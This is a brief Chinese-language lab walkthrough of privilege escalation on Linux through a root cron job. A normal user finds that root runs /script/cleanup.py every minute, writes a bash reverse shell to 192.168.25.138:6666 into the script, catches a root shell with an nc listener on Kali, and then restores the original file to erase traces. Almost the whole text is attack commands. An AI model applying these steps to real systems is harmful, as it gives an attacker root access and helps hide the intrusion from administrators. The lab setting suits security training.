實驗環境還是一樣的

當獲取一個linux普通用戶的時，查看計劃任務

首先我們退出root用戶

cat /etc/crontab

crontab -l

查看當前用戶命令

/var/spool/cron/crontabs/root

這個目錄是root任務文件 默認是不是root權限是 看不到

tail -f /var/log/syslog

咋們切換用戶web1

查看日志文件 發現root每一分鐘會執行一次 cleanup.py文件

然后復制一份文件 到tmp目錄 用于修改回來

cp /script/cleanup.py /tmp/cleanup.py

然后我們修改

/script/cleanup.py

這個.py文件

bash -i >& /dev/tcp/192.168.25.138/6666 0>&1

然后在kail新建窗口 開啟監聽

nc -lvnp 6666

等待計劃任務執行

現在返回shell

root

提權成功

然后我們消除痕跡 我們把原來的文件修改回來 就好了